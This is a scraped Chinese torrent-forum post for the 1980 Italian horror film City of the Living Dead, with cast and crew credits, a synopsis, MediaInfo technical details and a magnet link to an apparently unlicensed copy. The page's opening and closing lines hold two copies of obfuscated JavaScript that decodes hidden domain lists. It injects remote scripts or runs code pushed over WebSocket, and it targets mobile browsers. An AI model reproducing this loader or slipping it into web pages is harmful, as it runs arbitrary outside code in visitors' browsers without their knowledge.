僵尸城市[双语字幕].City.of.the.Living.Dead.1980.1080p.BluRay.DTS.x265-10bit 7.08GB

版主小s 1月前 233

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 僵尸城市 / 活死人之城 / Frayeurs / The Gates of Hell / City of the Living Dead

◎片 名 Paura nella città dei morti viventi

◎年 代 1980

◎产 地 意大利

◎类 别 恐怖

◎语 言 英语 / 意大利语

◎上映日期 1980-08-11

◎IMDb链接 https://www.imdb.com/title/tt0081318/

◎豆瓣评分 6.4/10 (530人评价)

◎豆瓣链接 https://movie.douban.com/subject/2181137/

◎片 长 93 分钟

◎导 演 卢西奥·弗尔兹 Lucio Fulci (id:1019131)

◎编 剧 卢西奥·弗尔兹 Lucio Fulci (id:1019131)

H·P·洛夫克拉夫特 H.P. Lovecraft (id:1025325)

达尔达诺·萨凯蒂 Dardano Sacchetti (id:1012804)

◎演 员 克里斯托弗·乔治 Christopher George (id:1032236)

卡特里娜 马科尔 Catriona MacColl (id:1122884)

卡洛·德梅约 Carlo De Mejo (id:1084052)

安东内拉·因泰伦吉 Antonella Interlenghi (id:1107333)

乔瓦尼·隆巴多·雷迪斯 Giovanni Lombardo Radice (id:1117143)

达妮埃拉·多里亚 Daniela Doria (id:1316697)

卢卡·韦南蒂尼 Luca Venantini (id:1151360)

韦朗第洛·维朗迪尼 Venantino Venantini (id:1158551)

米歇尔·索伊 Michele Soavi (id:1012569)

James Sampson James Sampson (id:1296584)

卢西亚诺·罗西 Luciano Rossi (id:1111252)

珍妮特·阿格伦 Janet Agren (id:1060642)

卢西奥·弗尔兹 Lucio Fulci (id:1019131)

卢西奥·弗尔兹 Lucio Fulci (id:1019131)

法比奥·弗里齐 Fabio Frizzi (id:1012734)

Sergio Salvati Sergio Salvati (id:1020402)

Vincenzo Tomassi Vincenzo Tomassi (id:1043503)

马西莫·安东内洛·格伦 Massimo Antonello Geleng (id:1284681)

马西莫·安东内洛·格伦 Massimo Antonello Geleng (id:1284681)

Rosario Prestopino Rosario Prestopino (id:1137077)

◎标 签 恐怖 / 意大利 / 丧尸 / 僵尸 / 卢西奥·弗尔兹 / 1980 / 意大利电影 / LucioFulci

◎简 介

美国边陲的新英格兰小镇上,一个名叫托马斯(Fabrizio Jovine 饰)的神父上吊自杀,他的死导致地狱之门洞开。居住在纽约的灵媒玛丽通过感应看到了这一切,她深知地狱之门打开的恐怖后果,慌乱之中竟摔下楼去。警察认定玛丽已经死亡,第二天将其下葬。名叫彼得?贝尔(Chirstopher George 饰)偶然经过公墓,听到墓地中传来的呼叫,终于将玛丽解救出来。

彼得从这个灵媒口中得知,地狱之门是魔鬼进入人间的必行之路,如果不及时关闭,万圣节那天将有成千上万的幽灵和鬼魂充斥人间,为害世人。为了保护无辜的生命,彼得和玛丽共同前往地狱之门的所在地……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 252477797372487696802962262959749148182 (0xBDF1747C891593017DC98E1199A52E16)

  4. Complete name : [email protected]BQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.08 GiB

  8. Duration : 1 h 32 min

  9. Overall bit rate : 10.9 Mb/s

  10. Movie name : City of the Living Dead 1980 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-10-29 01:13:07

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 32 min

  21. Bit rate : 9 374 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 040 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.196

  31. Stream size : 6.07 GiB (86%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 32 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1 000 MiB (14%)

  51. Title : English

  52. Language : English

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 31 min

  62. Bit rate : 15.3 kb/s

  63. Count of elements : 1369

  64. Stream size : 9.96 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 31 min

  76. Bit rate : 15.6 kb/s

  77. Count of elements : 1369

  78. Stream size : 10.2 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Text #3

  84. ID : 5

  85. Format : PGS

  86. Muxing mode : zlib

  87. Codec ID : S_HDMV/PGS

  88. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration : 1 h 31 min

  90. Bit rate : 27.6 kb/s

  91. Count of elements : 1370

  92. Stream size : 18.0 MiB (0%)

  93. Title : CHS&ENG

  94. Language : Chinese

  95. Default : No

  96. Forced : No


  97. Text #4

  98. ID : 6

  99. Format : PGS

  100. Muxing mode : zlib

  101. Codec ID : S_HDMV/PGS

  102. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration : 1 h 31 min

  104. Bit rate : 27.9 kb/s

  105. Count of elements : 1370

  106. Stream size : 18.2 MiB (0%)

  107. Title : CHT&ENG

  108. Language : Chinese

  109. Default : No

  110. Forced : No


  111. Menu

  112. 00:00:00.000 : en:Chapter 01

  113. 00:08:49.708 : en:Chapter 02

  114. 00:17:15.625 : en:Chapter 03

  115. 00:26:26.792 : en:Chapter 04

  116. 00:35:11.458 : en:Chapter 05

  117. 00:42:38.458 : en:Chapter 06

  118. 00:51:17.458 : en:Chapter 07

  119. 00:58:57.750 : en:Chapter 08

  120. 01:08:14.625 : en:Chapter 09

  121. 01:18:26.750 : en:Chapter 10




复制代码


TAGS 恐怖

磁力链:
  • magnet:?xt=urn:btih:031F14D919C1A49752714D71BBC252213CB921CC

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};